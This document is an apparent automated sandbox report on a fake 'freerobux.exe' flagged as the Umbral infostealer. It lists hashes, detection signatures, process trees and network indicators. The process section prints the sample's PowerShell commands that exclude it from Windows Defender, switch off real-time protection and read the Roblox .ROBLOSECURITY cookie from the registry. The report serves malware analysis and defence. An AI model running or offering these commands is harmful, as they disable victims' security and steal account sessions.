Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
- max time kernel: 117s
- max time network: 118s
- platform: windows7_x64
- resource: win7-20240708-en
- resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
- submitted: 24/09/2024, 19:48
Behavioral task: behavioral1
- Sample: freerobux.exe
- Resource: win7-20240708-en
General
- Target: freerobux.exe
- Size: 229KB
- MD5: b994081ca7787fdf253902e28c1a5c47
- SHA1: 91c30f314dda937fac7b5133c4f378e6c2cd47ff
- SHA256: 429170a034f165b7b9223205b04482ba8b1cc5582f9344bf70123c7e7e8e4c3e
- SHA512: 17b80c2325c0e900fa1a2c026d8eba0c3985ce27bb71c4f226a6d52a3f0122e4ad969fb163d75ec435169ea12c8b9538777986ab2dc498e5529d94ce20d019d4
- SSDEEP: 6144:FloZMArIkd8g+EtXHkv/iD4vWEs9rI8jP67NokR37b8e1mAi:HoZHL+EP8vWEs9rI8jP67NokRv+
Malware Config
Signatures

Detect Umbral payload (1 IoC)
- resource: behavioral1/memory/3044-1-0x0000000000F90000-0x0000000000FD0000-memory.dmp
- yara_rule: family_umbral

Command and Scripting Interpreter: PowerShell (1 TTP, 4 IoCs)
Run PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
- pid / Process: 2656 powershell.exe; 2264 powershell.exe; 3000 powershell.exe; 2348 powershell.exe

Drops file in Drivers directory (1 IoC)
- description: File opened for modification
- ioc: C:\Windows\System32\drivers\etc\hosts
- Process: freerobux.exe

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
- flow / ioc: 8 discord.com; 9 discord.com

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow / ioc: 6 ip-api.com

Detects videocard installed (1 TTP, 1 IoC)
Uses WMIC.exe to determine videocard installed.
- pid / Process: 1256 wmic.exe

Suspicious behavior: EnumeratesProcesses (5 IoCs)
- pid / Process: 2656 powershell.exe; 2264 powershell.exe; 3000 powershell.exe; 1488 powershell.exe; 2348 powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 27 IoCs
Processes

- C:\Users\Admin\AppData\Local\Temp\freerobux.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\freerobux.exe"
  - Drops file in Drivers directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 3044

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\freerobux.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2656

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2264

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 3000

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1488

  - C:\Windows\System32\Wbem\wmic.exe (depth 2)
    Command line: "wmic.exe" os get Caption
    - Suspicious use of AdjustPrivilegeToken
    PID: 2244

  - C:\Windows\System32\Wbem\wmic.exe (depth 2)
    Command line: "wmic.exe" computersystem get totalphysicalmemory
    - Suspicious use of AdjustPrivilegeToken
    PID: 2028

  - C:\Windows\System32\Wbem\wmic.exe (depth 2)
    Command line: "wmic.exe" csproduct get uuid
    PID: 536

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID: 2348

  - C:\Windows\System32\Wbem\wmic.exe (depth 2)
    Command line: "wmic" path win32_VideoController get name
    - Detects videocard installed
    PID: 1256
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 1e7ed5fcbca860fdce9d6a892d52c0a3
  SHA1: 3bbbbba92f4a3bea2d43fe2deeea9a3f3290bbf7
  SHA256: 3e2bcb98ddb9dd3c7f602a12083993e14a8740dd70c31f5e99e9c159304e4d19
  SHA512: 666e251d10df588c4cf66ee1e2034513b766fa259114db44ea02dd13e7b00c299c87047099d618f3bf703bb606410dd6f99b227bff60b11b1b6f056a0ac0dde0